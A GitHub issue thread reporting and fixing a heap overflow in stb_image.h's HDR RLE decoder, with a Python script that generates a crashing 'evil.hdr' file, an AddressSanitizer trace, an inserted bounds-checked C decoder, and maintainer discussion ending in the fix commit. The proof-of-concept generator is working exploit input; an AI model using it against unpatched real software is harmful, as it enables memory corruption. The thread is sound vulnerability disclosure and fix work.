stb_image.h: stbi__hdr_load heap overflow #317

Closed
cryptoad opened this Issue May 25, 2016 · 6 comments

@cryptoad

There is a heap overflow condition in the HDR parsing due to the RLE decoding loop not checking that there is enough space in the allocated buffer.

An HDR triggering the vulnerability can be generated with the following Python script:

import struct

def main():
  # Radiance HDR header: magic, pixel format, blank line, then the resolution string
  h=b'#?RADIANCE\n'
  h+=b'FORMAT=32-bit_rle_rgbe\n'
  h+=b'\n'
  height=1
  width=0x3a
  h+=b'-Y %d +X %d\n'%(height,width)
  # new-style RLE scanline header: 2, 2, width as a big-endian 16-bit value
  h+=struct.pack('>BBH',2,2,width)
  q=0x4343434343434343
  # one RLE stream per RGBE channel: a run of width-1 bytes followed by a
  # 3-byte literal, so each channel produces width+2 bytes for a width-wide scanline
  for i in range(4):
    h+=struct.pack('>B',128+(width-1))+b'B'
    h+=struct.pack('>B',3)+b'B'+struct.pack('>BB',(q>>(i<<3))&0xff,
                                                  (q>>(32+(i<<3)))&0xff)

  with open('evil.hdr','wb') as f:
    f.write(h)

if __name__=='__main__':
  main()

And here is the ASan report:

==8373==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009ea8 at pc 0x7f26b4438221 bp 0x7ffcb3d619f0 sp 0x7ffcb3d619e8
WRITE of size 1 at 0x611000009ea8 thread T0
    #0 0x7f26b4438220 in stbi__hdr_load third_party/stblib/stb_image.h:6237:44
    #1 0x7f26b4431d65 in stbi__load_main third_party/stblib/stb_image.h:964:20
    #2 0x7f26b4430a77 in stbi__load_flip third_party/stblib/stb_image.h:980:28
    #3 0x7f26b4430fbf in stbi_load_from_memory third_party/stblib/stb_image.h:1069:11
    #4 0x7f26b4430266 in main experimental/users/kostyak/ionfuzz/stb.cc:21:8
    #5 0x7f26b33c1ce7 in __libc_start_main (/usr/grte/v4/lib64/libc.so.6+0x38ce7)
    #6 0x7f26b4371f08 in _start /usr/grte/v4/debug-src/glibc-2.19/csu/../sysdeps/x86_64/start.S:108

0x611000009ea8 is located 0 bytes to the right of 232-byte region [0x611000009dc0,0x611000009ea8)
allocated by thread T0 here:
    #0 0x7f26b441aa3b in __interceptor_malloc third_party/llvm/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7f26b4431234 in stbi__malloc third_party/stblib/stb_image.h:900:12
    #2 0x7f26b443805e in stbi__hdr_load third_party/stblib/stb_image.h:6222:55
    #3 0x7f26b4431d65 in stbi__load_main third_party/stblib/stb_image.h:964:20
    #4 0x7f26b4430a77 in stbi__load_flip third_party/stblib/stb_image.h:980:28
    #5 0x7f26b4430fbf in stbi_load_from_memory third_party/stblib/stb_image.h:1069:11
    #6 0x7f26b4430266 in main experimental/users/kostyak/ionfuzz/stb.cc:21:8
    #7 0x7f26b33c1ce7 in __libc_start_main (/usr/grte/v4/lib64/libc.so.6+0x38ce7)
    #8 0x7f26b4371f08 in _start /usr/grte/v4/debug-src/glibc-2.19/csu/../sysdeps/x86_64/start.S:108
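The bounds check the report is asking for, as an added example that is not stb_image's code: a decoder for one channel of a Radiance new-style RLE scanline that rejects any run or literal block that would write past the scanline width, which is what the later fix commit ("Runs need to be bounds checked") does. The function name `hdr_rle_decode_channel` and the sample byte arrays are my own constructions; the BAD sample mirrors the run-then-literal pattern of the script above.

```c
#include <stddef.h>
#include <stdint.h>

/* Decode one channel of a Radiance "new-style" RLE scanline into
   out[0], out[stride], ..., out[(width-1)*stride] (stride 4 interleaves RGBE).
   Returns the number of input bytes consumed, or 0 if the data is truncated or
   a run/literal block would write past the scanline. Count byte c: c > 128 means
   repeat the next byte c-128 times; 1..128 means copy the next c bytes. */
static size_t hdr_rle_decode_channel(const uint8_t *in, size_t in_len,
                                     uint8_t *out, int width, int stride)
{
    size_t pos = 0;
    int i = 0;
    while (i < width) {
        if (pos >= in_len) return 0;              /* truncated input */
        int c = in[pos++];
        int n = c > 128 ? c - 128 : c;
        /* The check the fix commit calls for: the block must fit in the remaining
           width; a zero-length block (c == 0 or 128) would make no progress. */
        if (n == 0 || n > width - i) return 0;
        if (c > 128) {                            /* run: one value repeated */
            if (pos >= in_len) return 0;
            uint8_t v = in[pos++];
            for (int k = 0; k < n; k++) out[(i + k) * stride] = v;
        } else {                                  /* literal block */
            if (pos + (size_t)n > in_len) return 0;
            for (int k = 0; k < n; k++) out[(i + k) * stride] = in[pos + k];
            pos += (size_t)n;
        }
        i += n;
    }
    return pos;
}

/* Constructed samples for a width-6 channel. GOOD: a run of four 0x00 then two
   literals. BAD mirrors the report's pattern: a run of width-1 bytes followed
   by a 3-byte literal, i.e. width+2 output bytes for a width-byte channel. */
static const uint8_t HDR_GOOD[] = { 128 + 4, 0x00, 2, 0xAA, 0xBB };
static const uint8_t HDR_BAD[]  = { 128 + 5, 0x42, 3, 0x42, 0x43, 0x44 };

int hdr_demo_good(void)
{
    uint8_t out[6] = {0};
    size_t used = hdr_rle_decode_channel(HDR_GOOD, sizeof HDR_GOOD, out, 6, 1);
    return used == sizeof HDR_GOOD && out[0] == 0 && out[3] == 0 && out[4] == 0xAA && out[5] == 0xBB;
}

int hdr_demo_bad(void)
{
    uint8_t out[6];                    /* an unchecked decoder would write out[6..7] */
    return hdr_rle_decode_channel(HDR_BAD, sizeof HDR_BAD, out, 6, 1) == 0;
}
```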
@nothings

Owner

nothings commented May 25, 2016

Is there a reason you're posting a script that generates the file rather than attaching the file?

@cryptoad

cryptoad commented May 26, 2016

Well the file itself would be a single instance of things gone wrong, while the script can be used to generate other edge cases and test a potential fix more thoroughly.

@nothings

Owner

nothings commented May 26, 2016

Only if I have whatever fuzzing tool you're using? I don't even have python installed, so it's not particularly useful to me either way.

@cryptoad

cryptoad commented May 27, 2016

Well this one just generates an evil.hdr file that triggers the issue. There is no additional dependency on anything, just need Python. If you don't want to install Python you might be able to use an online compiler maybe, haven't tried any though.

@andrewla

andrewla commented Jun 6, 2016

I've actually been doing a fuzz of the stb_image.h file and have independently identified most of the issues that @cryptoad has found here. I've been using AFL -- http://lcamtuf.coredump.cx/afl/ -- which is very easy to set up and get running.

For reference, here is a zip of the file produced by the above script, and I've reproed that it does seg fault.
evil.hdr.zip

@cryptoad

cryptoad commented Jun 9, 2016

Attached is a diff that seems to fix the issues reported (and a couple more).
Do not take it as is though, you might want to double check it and do some regression testing to make sure nothing broke.

stblib-diff.txt

rygorous added a commit to rygorous/stb that referenced this issue Aug 13, 2016

stb_image: Fix HDR/PSD RLE decoders.
Runs need to be bounds checked.

Fixes issues #315, #317.

rygorous added a commit to rygorous/stb that referenced this issue Oct 22, 2016

stb_image: Fix HDR/PSD RLE decoders.
Runs need to be bounds checked.

Fixes issues #315, #317.

@rygorous rygorous closed this Dec 4, 2016
